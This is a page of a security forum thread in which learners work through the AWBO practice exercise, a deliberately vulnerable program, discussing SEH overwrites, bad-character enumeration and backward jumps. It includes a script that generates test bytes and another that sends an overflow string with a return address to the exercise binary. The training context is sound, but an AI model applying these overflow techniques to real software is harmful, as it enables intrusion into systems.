Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: AWBO Buffer Overflow Exercise

  1. #1
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    8

    Default AWBO Buffer Overflow Exercise

    Hello,
    I'm pretty new to developing exploits and I'm trying the awbo exercises, which can be found at snort.org/vrt/tools/awbo.html ... I've successfully triggered the vulnerability (on the first exercise), which is a SEH overflow...

    At my current level of knowledge I'm stuck on 3 points:

    1 - The payload I need to jump to is before the SEH overflow
    2 - The opcodes to a JUMP SHORT do not work (bad chars I believe...), another problem is that I need to jump over 128 bytes before, so a SHORT won't work
    3 - Required opcodes to decode the payload seem to be blocked (x86/alpha_upper), I've also tested the x86/alpha_mixed...

    Is there any tool which generates a list of opcodes that I may insert as a payload and analise what are the bad chars?
    What about the other issues I've mentioned?

    Any help is appreciated! Thank you.

  2. #2
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    18

    Default

    Hmmm, I'm pretty new to exploit development also. How about generating a string with the entire ascii set (omitting the null character of course). Send that in the buffer and check it out through the debugger. See what gets filtered and exclude those characters as bad. I guess you might need to run it through several times to get all the badchars.

    That's the advice given in the shellcoder's handbook in any case, and it seemed to work for me.

    I'd also appreciate any recommendations on a better way. Oh, thanks for the tip on the awbo exercises as well; I hadn't seen those before so extra practice ahead!

    As for the tool to find opcodes: msfpescan maybe?

    I'm very new to jumps so haven't had much experience there sorry. Is there such a thing as a LONG jump though or can you use two SHORT jumps?

    Cheers

  3. #3
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    8

    Default

    Thanks for the help F1gureF0ur!
    I've made this script in order to generate the string and redirected its output to a file:
    Code:
    import sys
    
    sys.stdout.write("\"")
    i = 1
    while i < 255:
    	sys.stdout.write("\\x")
    	if i < 16:
    		sys.stdout.write("0")
    	sys.stdout.write(hex(i)[2:])
    	i += 1
    print("\"")
    Then I put that in my exploit and kept running it with blocks of the string and jotting the bad chars down(the ones that didn't appear on the memory where they should or got replaced with something else). I found some that got replaced with another string, don't really know whether it's a particularity of that exercise or not...

    Code:
    \x61 -> \x85
    
    \x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f -> \x3f
    
    \xa2 -> \x9b
    \xa3 -> \x9c
    \xa7 -> \x15
    \xa9 -> \x22
    \xaa -> \xa6
    \xac -> \xaa
    \xb0 -> \xf8
    \xb2 -> \xfd
    \xb3 -> \x33
    \xb8 -> \x27
    \xb9 -> \x31
    \xba -> \xa7
    \xbb -> \x3d
    \xbc -> \x2c
    \xbd -> \x2d
    \xbe -> \x2e
    \xbf -> \x3b
    \xc0 -> \x27
    \xdc -> \x5d
    \xdd -> \x5b
    \xde -> \x7e
    \xe3\xe4 -> \x30
    \xe2 -> \x5c
    \xe7 -> \x87
    Well, I've also tried to put these chars in another positions of the array, some got replaced again, some haven't... I'm pretty confused right now...

    These are the ones that did not appear in the memory:

    Code:
    \x07\x08\x0a\x0d\x13\x14\x1b\x25\x28\x29\x2b\x5e\x5f\x60\x7b\x7d\x7e\x7f\x81\x8d\x8f\x90\x9d\xa0\xa1\xa4\xa5\xa6\xa8\xab\xad\xae\xaf\xb1\xb4\xb5\xb6\xb7\xc3\xc4\xc5\xc6\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1
    Am I doing this the right way? Let me know if you tried this exercise and what did you do in order to solve the puzzle...

    Thank you again.

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    I used a modified version of the jump code from this page last time I did an SEH overwrite, to get to the earlier section of my buffer from the section of memory after the SEH address.

    You'll probably be able to roll your own using the details at the link above, but if you like I can post the assembly and provide the method I used to convert it to shellcode (my rubbish assembly skills necessitated some nasty hacks, but it worked).
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    18

    Default

    That's a nice little article. Thanks lupin

    I also found a couple of the videos (webcasts) in the Offensive Security website resources section helpful with seh overflows. The apple QuickTime vid is good, as is the Surgemail overview.

    If anyone can point to any other good resources I'd be grateful!

  6. #6
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by F1gureF0ur View Post
    That's a nice little article. Thanks lupin

    I also found a couple of the videos (webcasts) in the Offensive Security website resources section helpful with seh overflows. The apple QuickTime vid is good, as is the Surgemail overview.

    If anyone can point to any other good resources I'd be grateful!
    Yes, the Quicktime Offensive Security video is a good one.

    Theres some more good stuff here, and here and the securityforest site that my previous link was from has some other good references.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  7. #7
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    8

    Default

    Thank you for the replies!
    I've also found the offensive security's webcast very didactic, pretty good resource. Thank you lupin for the links provided, I'll study that and post the results of my tests as soon as possible.
    There's still the bad chars issue, but one step at a time. As soon as I can get EIP pointing to my buffer, I'll focus on that problem. =)
    (or... perhaps I should solve the bad chars issue before?)

  8. #8
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by trojanrs View Post
    Thank you for the replies!
    I've also found the offensive security's webcast very didactic, pretty good resource. Thank you lupin for the links provided, I'll study that and post the results of my tests as soon as possible.
    There's still the bad chars issue, but one step at a time. As soon as I can get EIP pointing to my buffer, I'll focus on that problem. =)
    (or... perhaps I should solve the bad chars issue before?)
    Get control of CPU execution first, then look at bad characters. If bad characters are going to be an issue, it will most likely become apparent when you start to insert your shellcode, and you can deal with it then. The bad character topic also came up here, so have a look at that too.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  9. #9
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    18

    Default

    Thank you so much for that lupin. I've been struggling with my first SEH overwrite today and that series of blog articles looks like it will be the extra bit of 'hand-holding' i'll need.

    Cheers!

  10. #10
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    8

    Default

    lupin, the jump backwards assembly code worked! I hardcoded it into immunity dbg though, since I think my string input method is a piece of...

    This is the code I'm using to send the string:

    Code:
    import win32com.client
    shell = win32com.client.Dispatch("WScript.Shell")
    shell.AppActivate('awbo2.exe')
    
    shell.SendKeys(('A' * 1076) + "\x42\x42\x42\x42\x6b\x10\x40\x00")
    shell.SendKeys('{ENTER}')
    It will jump to a pop pop ret and return execution to "\x42\x42\x42\x42", where a jump short should take place...

    I think the bad chars problem is being originated from the method I'm currently using. Is there a better way to send the string to the program when it's opened with immdbg?

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •